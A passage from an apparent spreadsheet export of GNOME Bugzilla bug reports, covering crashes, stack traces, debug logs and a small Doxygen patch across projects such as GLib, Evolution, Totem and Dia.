Steps to reproduce:
Setting compression to zero puts out the following DEBUG message:
Actual results:
(flegita:16671): GLib-GObject-WARNING **: value 0 of type `gint' is invalid
or out of range for property `compression' of type `gint'
Expected results:
Does this happen every time?
Other information:
split from Bug #493179</t>
  </si>
  <si>
    <t>Matthias</t>
  </si>
  <si>
    <t>GLIB-136283</t>
  </si>
  <si>
    <t>make check:  printf-test FAILED</t>
  </si>
  <si>
    <t>GLib-ERROR **: gmem.c:140: failed to allocate 18446744069414584325 bytes
aborting...
/bin/sh: 18168 Trace/BPT trap(coredump)
FAIL: printf-test
This looks like a pure 3264 bit problem ...</t>
  </si>
  <si>
    <t>GTK-ENGINES-422434</t>
  </si>
  <si>
    <t>Color problems when using dark tones</t>
  </si>
  <si>
    <t>Please describe the problem:
There's a problem with the tooltip colors if a dark background color and a light foreground color are used for the windows. The text becomes unreadable and the background differs from the rest of the theme.
When using the same dark background colors (these can be any dark grey/black tone) the insensitive items in the menus aren't strongly distinguished from the sensitive ones.
Steps to reproduce:
1. Choose a dark color for the window background and a light color for the foreground
2. Open a tooltip
3. Open a menu with some insensitive items.
Actual results:
Text becomes ugly.
Expected results:
A readable text and a themeable background for the tooltip and an easy to distinguish insensitive foreground color.
Does this happen every time?
Yes.
Other information:
I have only tested it on Clearlooks and Glossy themes. I think that the solution would be a change in the tooltip configuration on the theme files to use some variation of the window background color but the solution to the insensitive items would involve the engines directly I guess.</t>
  </si>
  <si>
    <t>NAUTILUS-74975</t>
  </si>
  <si>
    <t>Cannot resize columns in list view.</t>
  </si>
  <si>
    <t>The list view is unable to resize any of the columns.  The column widths
appear to be adjusted to the size of the longest file name.</t>
  </si>
  <si>
    <t>WEBSITE-81472</t>
  </si>
  <si>
    <t>Error in depends.dia</t>
  </si>
  <si>
    <t>The http://developer.gnome.org/dotplan/notes/depends.dia and 
http://developer.gnome.org/dotplan/notes/depends.png have error in
section Gnome 2.0 Core applications platform gnome-core depends from
library libwnk but this library not exist may be it is library libwnck?</t>
  </si>
  <si>
    <t>blace</t>
  </si>
  <si>
    <t>F-SPOT-343526</t>
  </si>
  <si>
    <t>Adjust Color: pops up and covers picture</t>
  </si>
  <si>
    <t>the adjust color dialog box when activated should not pop up in the middle of the screen - effectively covering the photo to be edited.  Perhaps it could appear on the side or inline on the side.
Other information:</t>
  </si>
  <si>
    <t>ORCA-401889</t>
  </si>
  <si>
    <t>Orca does not speak backspaced characters in certain dialogs</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Press Alt F2 to get into the Run Application dialog
2. Type a few characters
3. Use backspace to remove the characters
Orca is not speaking the characters that are removed.
This can also be reproduced in certain Save As dialogs (e.g. Gedit's).  This seems to be true in both Edgy and Feisty.</t>
  </si>
  <si>
    <t>EVOLUTION-327933</t>
  </si>
  <si>
    <t>Preferences dialog named Settings</t>
  </si>
  <si>
    <t>The Preferences Dialog (see Edit / Preferences) still is named Evolution Settings rather than Evolution Preferences.
Simply messing^Wrenaming menu entries isn't sufficient sometimes...</t>
  </si>
  <si>
    <t>GNUMERIC-505454</t>
  </si>
  <si>
    <t>gnumeric won't print in Windows or Opera</t>
  </si>
  <si>
    <t>Please describe the problem:
No matter what I try I can't get it to print with my HP Laser Jet 4M printer although printer is fine on everything else. I can get print preview to properly display but the printer sends a blank page.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>fkeese</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-50746</t>
  </si>
  <si>
    <t>Tried to use Embossed Logo on JPG background</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.2
Synopsis: Tried to use Embossed Logo on JPG background
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.16-3 i686 unknown
C library: glibc-2.1.3-22
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.11
libxml: 1.8.10
gnome-print: gnome-print-0.25-0_helix_1
gnome-core: gnome-core 1.2.4
Description:
When I set my jpg background properties to be embosed logo it crashed.
Debugging information:
0x405ea8c9 in __wait4 () from /lib/libc.so.6
#0  0x405ea8c9 in __wait4 () from /lib/libc.so.6
#1  0x406491cc in ?? () from /lib/libc.so.6
#2  0x4014532f in gnome_segv_handle (signum=11) at gnome-init.c:660
#3  0x40577c48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x405b2f9a in __libc_free (mem=0x80d8b80) at malloc.c:3023
#5  0x4054d7f9 in free_buffer () from /usr/lib/libgdk_pixbuf.so.2
#6  0x4054d7c1 in gdk_pixbuf_finalize () from /usr/lib/libgdk_pixbuf.so.2
#7  0x4054d6e6 in gdk_pixbuf_unref () from /usr/lib/libgdk_pixbuf.so.2
#8  0x804d052 in fill_monitor ()
#9  0x804d1fe in set_wallpaper_type ()
#10 0x4028422d in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#11 0x402b19bd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#12 0x402b0e02 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x402aef05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x402cd418 in gtk_toggle_button_toggled () from /usr/lib/libgtk-1.2.so.0
#15 0x402a1932 in gtk_radio_button_clicked () from /usr/lib/libgtk-1.2.so.0
#16 0x4028422d in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#17 0x402b0cbb in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#18 0x402aef05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#19 0x40223858 in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#20 0x402cda38 in gtk_toggle_button_released () from /usr/lib/libgtk-1.2.so.0
#21 0x4028422d in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#22 0x402b0cbb in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#23 0x402aef05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#24 0x40223798 in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#25 0x40224802 in gtk_button_button_release () from /usr/lib/libgtk-1.2.so.0
#26 0x40283df9 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#27 0x402b0e3b in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#28 0x402aef05 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#29 0x402e431c in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#30 0x40283d52 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#31 0x40282faa in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#32 0x4032e53b in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#33 0x40087186 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#34 0x40087751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#35 0x400878f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#36 0x402828e9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#37 0x400224f5 in capplet_corba_gtk_main () from /usr/lib/libcapplet.so.0
#38 0x40021f05 in capplet_gtk_main () from /usr/lib/libcapplet.so.0
#39 0x804f8a3 in main ()
#40 0x405719cb in __libc_start_main (main=0x804f740  argc=1 
    argv=0xbffffa24 init=0x804afa4  fini=0x804f92c  
    rtld_fini=0x4000aea0  stack_end=0xbffffa1c)
    at ../sysdeps/generic/libc-start.c:92
#0  0x405ea8c9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x406491cc in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x4014532f in gnome_segv_handle (signum=11) at gnome-init.c:660
estatus = 0
in_segv = 1
pid = 0
#3  0x40577c48 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x405b2f9a in __libc_free (mem=0x80d8b80) at malloc.c:3023
mem = (void *) 0xbfffe980
ar_ptr = (arena *) 0x80d8b78
p = 0x80e5728
#5  0x4054d7f9 in free_buffer () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
#6  0x4054d7c1 in gdk_pixbuf_finalize () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
#7  0x4054d6e6 in gdk_pixbuf_unref () from /usr/lib/libgdk_pixbuf.so.2
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-02-10 12:21 -------
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (hstewart@esotericrealm.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>hstewart</t>
  </si>
  <si>
    <t>TOTEM-520631</t>
  </si>
  <si>
    <t>totem doesn't play one ogg movie</t>
  </si>
  <si>
    <t>Please describe the problem:
When trying to play https://bugzilla.redhat.com/attachment.cgi?id=296894 (which is attached to https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=436142) both inside of firefox or with standalone totem and downloaded OGG file totem doesn't do anything for a long time (approx. minute but I haven't timed it exactly) and then plays the movie without a problem.
Both ffplay and gst-launch playbin work on the file without any problems.
Steps to reproduce:
1. download the movie to the local hard drive (or even not -- the same happens inside of a firefox tab).
2. totem filename.ogg
3. 
Actual results:
long time nothing then the movie is played
Expected results:
working with the same delay as gst-launch playbin and ffplay (i.e. no delay at all)
Does this happen every time?
yes
Other information:
[matej@viklef tmp]$ GST_DEBUG_NO_COLOR=1 GST_DEBUG=*:2 totem video.ogg 2&gt; log
[matej@viklef tmp]$ cat log
0:00:00.091283000  1412 0x9529458 WARN    GST_PLUGIN_LOADING gstplugin.c:411:gst_plugin_load_file: module_open failed: /usr/lib/gstreamer-0.10/libgstfaad.so: undefined symbol: faacDecDecode
(totem:1412): GStreamer-WARNING **: Failed to load plugin '/usr/lib/gstreamer-0.10/libgstfaad.so': /usr/lib/gstreamer-0.10/libgstfaad.so: undefined symbol: faacDecDecode
0:00:52.358746000  1411 0x98ef098 WARN              oggdemux gstoggdemux.c:2337:gst_ogg_demux_read_chain: page is not BOS page
0:00:52.374194000  1411 0x98ef098 WARN              oggdemux gstoggdemux.c:2333:gst_ogg_demux_read_chain: problem reading BOS page: ret=-3
0:01:02.547722000  1411 0x9561ac0 WARN              oggdemux gstoggdemux.c:2337:gst_ogg_demux_read_chain: page is not BOS page
0:01:02.554223000  1411 0x9561ac0 WARN              oggdemux gstoggdemux.c:2333:gst_ogg_demux_read_chain: problem reading BOS page: ret=-3
[matej@viklef tmp]$ rpm -qa totem\* gstreamer-plugin\*
gstreamer-plugins-ugly-0.10.6-5.lvn8
gstreamer-plugins-base-devel-0.10.15-3.fc8
totem-2.20.1-2.fc8
gstreamer-plugins-bad-devel-0.10.5-14.lvn8
gstreamer-plugins-good-devel-0.10.6-7.fc8
gstreamer-plugins-bad-0.10.5-14.lvn8
gstreamer-plugins-pulse-0.9.5-0.4.svn20070924.fc8
gstreamer-plugins-schroedinger-0.9.0-1.fc8
gstreamer-plugins-good-0.10.6-7.fc8
totem-plparser-2.20.1-2.fc8
totem-galago-2.20.1-2.fc8
gstreamer-plugins-base-0.10.15-3.fc8
totem-mozplugin-2.20.1-2.fc8
[matej@viklef tmp]$</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-50523</t>
  </si>
  <si>
    <t>Was just changing ffrom one window to another</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  control-center
Severity: normal
Version:  1.2.2
Synopsis: Was just changing ffrom one window to another
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.2-12
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.6
gnome-libs: gnome-libs 1.2.11
libxml: 1.8.10
gnome-print: gnome-print-0.25-8_helix_1
gnome-core: gnome-core 1.2.4
Description:
I had the Control Center selected and try to select another option when
it crashed.
Debugging information:
(no debugging symbols found)...(no debugging symbols found)...
0x40553e69 in __wait4 () from /lib/libc.so.6
#0  0x40553e69 in __wait4 () from /lib/libc.so.6
#1  0x405bfe4c in __DTOR_END__ () from /lib/libc.so.6
#2  0x4015423a in gnome_segv_handle (signum=11) at gnome-init.c:660
#3  
#4  0x4008b285 in g_hash_table_foreach () from /usr/lib/libglib-1.2.so.0
#5  0x804f3c9 in local_mime_get_value ()
#6  0x4008b2b3 in g_hash_table_foreach () from /usr/lib/libglib-1.2.so.0
#7  0x804f514 in local_mime_get_value ()
#8  0x804f549 in write_initial_keys ()
#9  0x804afbb in _start ()
#10 0x4029f9e3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#11 0x402d1d4a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#12 0x402d108d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x402cf219 in gtk_signal_emit_by_name () from /usr/lib/libgtk-1.2.so.0
#14 0x4002714d in _capplet_widget_server_cancel ()
   from /usr/lib/libcapplet.so.0
#15 0x400274ab in server_cancel () from /usr/lib/libcapplet.so.0
#16 0x40027d0e in _ORBIT_skel_GNOME_capplet_cancel ()
   from /usr/lib/libcapplet.so.0
#17 0x40058364 in ORBit_POA_handle_request (recv_buffer=0x80a12e8 
    poa=0x809ad08) at orbit_poa.c:507
#18 0x4005a56e in ORBit_handle_incoming_request (recv_buffer=0x80a12e8)
    at server.c:89
#19 0x4005a795 in ORBit_handle_incoming_message (recv_buffer=0x80a12e8)
    at server.c:159
#20 0x40071420 in giop_main_handle_connection (connection=0x80d8138)
    at connection.c:1211
#21 0x400e341d in orb_handle_connection (source=0x80e1820 cond=G_IO_IN 
    cnx=0x80d8138) at orbitgtk.c:44
#22 0x4008d1a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#23 0x4008e987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#24 0x4008f001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#25 0x4008f1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#26 0x4029df87 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#27 0x40027635 in capplet_corba_gtk_main () from /usr/lib/libcapplet.so.0
#28 0x40026f47 in capplet_gtk_main () from /usr/lib/libcapplet.so.0
#29 0x804b4b6 in main ()
#30 0x404b7f31 in __libc_start_main (main=0x804b440  argc=3 
    ubp_av=0xbffff824 init=0x804a500  fini=0x804ff1c  
    rtld_fini=0x4000e274  stack_end=0xbffff81c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40553e69 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405bfe4c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x4015423a in gnome_segv_handle (signum=11) at gnome-init.c:660
in_segv.5 = 1
pid = 0
estatus = 0
buf = \000\000\000\000zÃ«g@LÃ¾[@Ã˜\202\r\bÃ˜\202\r\b8Ã¯Ã¿Â¿Â´lQ@Ã˜\202\r\b
#3  
No locals.
#4  0x4008b285 in g_hash_table_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#5  0x804f3c9 in local_mime_get_value ()
No symbol table info available.
#6  0x4008b2b3 in g_hash_table_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x804f514 in local_mime_get_value ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-02-02 07:02 -------
Unknown version 1.2.x in product control-center. Setting version to the default unspecified.
The original reporter (carlo.maraschin@capgemini.se) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component control-center-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>carlo.maraschin</t>
  </si>
  <si>
    <t>GNOME-BUILDER-771668</t>
  </si>
  <si>
    <t>Untranslatable string in gbp-build-perspective.c</t>
  </si>
  <si>
    <t>String Build Preferences in plugins/build-tools/gbp-build-perspective.c is not marked for translation.</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-513889</t>
  </si>
  <si>
    <t>crash in Sudoku: When playing the sudoku ...</t>
  </si>
  <si>
    <t>Version: 2.21.90
What were you doing when the application crashed?
When playing the sudoku game and starting out with double clicking the easy which always gives me the exact same game (number layout). To get a different game/number layout I press the new button at the very top left in the game and then double click the easy game level again and then the app. fails -every time.
Distribution: Ubuntu 8.04 (hardy)
Gnome Release: 2.21.90 2008-01-29 (Ubuntu)
BugBuddy Version: 2.20.1
System: Linux 2.6.24-5-generic #1 SMP Thu Jan 24 19:29:14 UTC 2008 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 10400090
Selinux: No
Accessibility: Disabled
GTK+ Theme: Human
Icon Theme: Human
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (47269 sec old) ---------------------
7271] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7271] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7271] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7271] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7271] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7272] 01:55:45: ERROR: Unimplemented: static void gnash::SWF::SWFHandlers::ActionImplementsOp(gnash::ActionExec&amp;)
7272] 01:55:45: ERROR: Unimplemented: static void gnash::SWF::SWFHandlers::ActionImplementsOp(gnash::ActionExec&amp;)
7272] 01:55:45: ACTIONSCRIPT ERROR: Script aborted due to exceeded limit: Max stack count reached (255)
7272] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7272] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7272] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7272] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7272] 01:55:45: ERROR: Unimplemented: gnash::as_value gnash::system_security_allowdomain(const gnash::fn_call&amp;)
7272] 01:55:45: ERROR: Unimpleme
...Too much output ignoring rest...
--------------------------------------------------
Traceback (most recent call last):
  File /var/lib/python-support/python2.5/gnome_sudoku/gsudoku.py line 905 in highlight_cells
    for xy in self.grid.col_coords[my_x]:
AttributeError: 'NoneType' object has no attribute 'col_coords'</t>
  </si>
  <si>
    <t>GTK+-75951</t>
  </si>
  <si>
    <t>gdk_event_get_root_coords returns (x x) instead of (x y)</t>
  </si>
  <si>
    <t>There is a bug in gdk_event_get_root_coords that makes it return the x
value for both x and y.</t>
  </si>
  <si>
    <t>GALEON-135570</t>
  </si>
  <si>
    <t>Odd random appearances of bookmark drag-and-drop</t>
  </si>
  <si>
    <t>I'm running galeon 1.3.13 -- didn't see that in the version
selector.
This is one of the weirdest bugs I've seen.
If I have the bookmark editor open and have dragged-and-dropped
some bookmarks around and then stop editing bookmarks for a while
and do other things in other windows while keeping galeon and its
bookmark editor open I will often see this bizarre behavior.
Randomly a very wide 1-line box will appear on the screen
move up or down the screen and then disappear.  It's as
if I just dragged-and-dropped a bookmark in the editor very
quickly -- except it happens when I'm not using the editor
am not in fact moving the mouse at all or typing or anything.
It just spontaneously occurs.  And then 10 or 20 seconds later
it occurs again.  Inspection of my bookmarks seems to show that
no bookmark is actually moving when this occurs.
I can't tell you how to reproduce this simply (that is I can't
say if you do this then this then this it *will* occur).
But I've been leaving and coming back to bookmark editing all
evening and this odd behavior keeps occurring.</t>
  </si>
  <si>
    <t>cmetzler</t>
  </si>
  <si>
    <t>DOXYGEN-484731</t>
  </si>
  <si>
    <t>Unindented fortran 90 INTERFACE not recognized</t>
  </si>
  <si>
    <t>I am testing the new fortran scanner in doxygen and I found out that it does not handle correctly INTERFACE blocks in which the INTERFACE statement is NOT indented. The problem appears both in the CVS version and in the version on dougdevel.org the following patch to fortranscanner.l apparently fixes the problem:
=======
--- src/fortranscanner.l        2007-10-08 15:35:44.000000000 +0200
+++ src/fortranscanner.l.orig   2007-08-15 20:35:30.000000000 +0200
@@ -31110 +31110 @@
                                         }
  /*------ ignore special fortran statements */
-^([ \t])*interface({BS_}{ID})?/[ \t\n] { // handle interface block
+(^|[ \t])interface({BS_}{ID})?/[ \t\n] { // handle interface block
                                          QString name = yytext
                                          int index = name.find(interface 0 FALSE)
-                                         index = name.find(QRegExp([^ \t]) index+9)
+                                         index = name.find(QRegExp([^ \\t]) index+9)
                                          //cout&lt;&lt;name&lt;&lt; &lt;&lt;index&lt;&lt;endl
                                          if(index!=-1)
                                            name = name.right(name.length()-index)
=======
the fix in QRegExp is not directly related to the bug but seems reasonable. Than k you for the developing doxygen hope this helps
 Davide</t>
  </si>
  <si>
    <t>dcesari</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-50043</t>
  </si>
  <si>
    <t>bugzilla doesn't recognise valid user</t>
  </si>
  <si>
    <t>I'm a valid user have my login and password. But sometimes (not 
everytime) I add comments to bugs it decides to claim that my username 
doesn't exist. I am not getting the password wrong. The only way to solve 
this problem is to go back to the bug refresh the screen thus removing 
all the input I added then re-type my comment and submit again then it 
works ok. This is frankly very annoying.
This bug is present on win98 IE5 when I asked IE to remember my password 
and also on win95 IE5.5 when IE is not remembering passwords and I input 
it myself.</t>
  </si>
  <si>
    <t>psuedo_azrael</t>
  </si>
  <si>
    <t>EVOLUTION-262706</t>
  </si>
  <si>
    <t>changing time-zone doesn't refresh calendar correctly ...</t>
  </si>
  <si>
    <t>Presumably this is a case of doing a trivially more powerful calendar
contents flush on this event
attached 2 images (pixelised but hopefully visibly different) where the
'all day' events have suddenly split into 8am-&gt;8am ranges across 2 days
having switched from San-Francisco to London timezones.
On re-starting they are back to normal occupying a single day =&gt; should be
easy to fix (?).</t>
  </si>
  <si>
    <t>GNOME-PANEL-509631</t>
  </si>
  <si>
    <t>Clock won't build with recent PolicyKit and libgweather</t>
  </si>
  <si>
    <t>Recent libgweather requires you to confirm that you are aware of API unstability.
When building against PolKit gnome-clock-applet-mechanism-glue.h is not built.</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-97320</t>
  </si>
  <si>
    <t>Multiple dialogs possible in mahjongg</t>
  </si>
  <si>
    <t>These games allow multiple About dialogs to be open at the same time:
  freecell
  gnome-stones
  gtali
  glines
  gnobots2
  gnometris
  gnotravex
  gnotski
  mahjongg
These games allow multiple Preferences dialogs:
  freecell
  gataxx
These games allow multiple Scores dialogs:
  freecell
  gnome-stones
  gnome-xbill
  glines
  gnibbles
  gnobots2
  gnometris
  gnotski
  same-gnome
  (I haven't checked gnomine's score dialog - have to learn how to play
first :)</t>
  </si>
  <si>
    <t>trmusson</t>
  </si>
  <si>
    <t>GAL-222909</t>
  </si>
  <si>
    <t>'Move Messages' de-sensitized wrongly</t>
  </si>
  <si>
    <t>If you do Edit-&gt;Select All and then unselect a few messages the
Actions-&gt;Move Messages menu item (same with Copy Messages) becomes
de-sensitized. They are still sensitive in the right-click menu though.</t>
  </si>
  <si>
    <t>LAST-EXIT-364802</t>
  </si>
  <si>
    <t>Currently eos signal doesn't set player state to stopped.</t>
  </si>
  <si>
    <t>Patch will follow...
Other information:</t>
  </si>
  <si>
    <t>EVOLUTION-200406</t>
  </si>
  <si>
    <t>intermittent crash in ldap_poll</t>
  </si>
  <si>
    <t>i can't reproduce this but there are crashing bugs in here.  i'll attach
stacktraces as i get them.</t>
  </si>
  <si>
    <t>GALEON-143458</t>
  </si>
  <si>
    <t>galeon 1.3.15 does not compile with gcc 3.4</t>
  </si>
  <si>
    <t>I get the following error:
cc1plus: warning: command line option -Wmissing-prototypes is valid for C/ObjC
         but not for C++
HeaderSniffer.cpp: In member function `nsresult HeaderSniffer::PerformSave(const
         nsCString&amp;)':
HeaderSniffer.cpp:645: error: ISO C++ forbids cast to non-reference type used as
         lvalue
I'm not so familiar with c++ so I wasn't able to fix it myself.</t>
  </si>
  <si>
    <t>TOTEM-122876</t>
  </si>
  <si>
    <t>can't eject the disc and it makes totem likely to crash</t>
  </si>
  <si>
    <t>This bug was originally reported against the Debian BTS:
http://bugs.debian.org/211968
Totem is reading a disc but wether I click on eject before of after
stopping the playing it can't eject it.
I get the following message on the console:
umount: /dev/scsi/host0/bus0/target0/lun0/cd is not mounted (according to mtab)
input_dvd: CDROMEJECT failed: Device or resource busy
On the other hand I can use the eject command-line program as a plain
user  with either /dev/sr0 /dev/cdroms/cdrom0 or
/dev/scsi/host0/bus0/target0/lun0/cd.
(For the completeness of the bug report this is an IDE drive with SCSI
emulation enabled).
----
I can reproduce that on my box (devfs too on a IDE drive without SCSI
emulation)</t>
  </si>
  <si>
    <t>EVOLUTION-DATA-SERVER-274212</t>
  </si>
  <si>
    <t>Crash while adding Fedora Release calendar</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 3 (Heidelberg)
Package: Evolution-Data-Server
Priority: Normal
Version: GNOME2.8.0 unspecified
Gnome-Distributor: Red Hat Inc
Synopsis: Crash while adding Fedora Release calendar
Bugzilla-Product: Evolution-Data-Server
Bugzilla-Component: Calendar
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.8.0)
Description:
Description of the crash:
While adding Fedora Release calendar EDS crashes
Steps to reproduce the crash:
1. From fedora website http://fedora.redhat.com/participate/schedule/
clicksubscribe to this calendar (in Firefox 1.0.2)
2. Crash occurs
3. 
Expected Results:
Subscribed to calendar
How often does this happen?
Only once. On repeat it says I have sucessfully subscribed to calendar
Additional Information:
Unknown reporter: e.rehrmann@earthlink.net changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>e.rehrmann</t>
  </si>
  <si>
    <t>GSTREAMER-515697</t>
  </si>
  <si>
    <t>[multifile] Several memory leaks exposed by unit test</t>
  </si>
  <si>
    <t>Hi
the attached patch fixes several memory leaks that are exposed by the unit test. For example multifilesrc leaks everything it reads :)</t>
  </si>
  <si>
    <t>GTK+-84955</t>
  </si>
  <si>
    <t>Gtkcombo popup window wrong size</t>
  </si>
  <si>
    <t>When the horizontal scrollbar is showed in a combo box popup window it's
sized incorrectly. (as result also vertical scrollbar is showed when not
necessary).
The bug is in the gtk_combo_get_pos function.
We are getting the scrollbar_spacing in this way:
GTK_SCROLLED_WINDOW_GET_CLASS (combo-&gt;popup)-&gt;scrollbar_spacing
and ignoring that the value could be negative.
The SCROLLBAR_SPACING(w) macro defined in gtkscrolledwindow.c in
case of negatives values is falling back to DEFAULT_SCROLLBAR_SPACING.
Using that macro would probably fix the problem at least it fixed it in
some code I stealed from gtkcombo )
But the macro is private...</t>
  </si>
  <si>
    <t>DIA-317980</t>
  </si>
  <si>
    <t>Breaking shape compatibility may break Dia</t>
  </si>
  <si>
    <t xml:space="preserve">Steps to reproduce:
1.  use (possibly messed up) defaults.dia file (should be in the additional
info below)
2.  open the program
3.  voila.
Stack trace:
Backtrace was generated from '/usr/bin/dia'
(no debugging symbols found)...Using host libthread_db library
/lib/tls/libthread_db.so.1.
(no debugging symbols found)...`shared object read from target memory'
has disappeared keeping its symbols.
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...[Thread debugging using
libthread_db enabled]
[New Thread -1208150336 (LWP 4651)]
(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0x00533402 in __kernel_vsyscall
()
#0  0x00533402 in __kernel_vsyscall ()
#1  0x0073c2f3 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#2  0x0663bf50 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
#3  
#4  0x007913b2 in dia_plugin_init () from
/usr/lib/dia/libstandard_objects.so
#5  0x003426b8 in dia_object_defaults_load () from
/usr/lib/dia/libdia.so
#6  0x0806b037 in app_init ()
#7  0x0809a945 in main ()
Thread 1 (Thread -1208150336 (LWP 4651)):
#0  0x00533402 in __kernel_vsyscall ()
No symbol table info available.
#1  0x0073c2f3 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#2  0x0663bf50 in libgnomeui_module_info_get () from
/usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x007913b2 in dia_plugin_init () from
/usr/lib/dia/libstandard_objects.so
No symbol table info available.
#5  0x003426b8 in dia_object_defaults_load () from
/usr/lib/dia/libdia.so
No symbol table info available.
#6  0x0806b037 in app_init ()
No symbol table info available.
#7  0x0809a945 in main ()
No symbol table info available.
Other information:
1.  Distribution: Fedora Core release 3 (Heidelberg)
Version: GNOME2.8.0 0.94
Gnome-Distributor: Red Hat Inc
2.  Description of the crash:
I was messing around with creating a new .shape &amp; .sheet.  I finally got
it working ) then the next time I opened dia I got the dia has quit
unexpectedly message.
3.  Lars Clausen (one of the current maintainers) suggested that I rename my
~/.dia/defaults.dia file &amp; try restarting twice to make sure the
newly-written defaults fixed my problem.  It did indeed fix my problem.
(Verified by moving the old defaults.dia file back into position.)  Lars
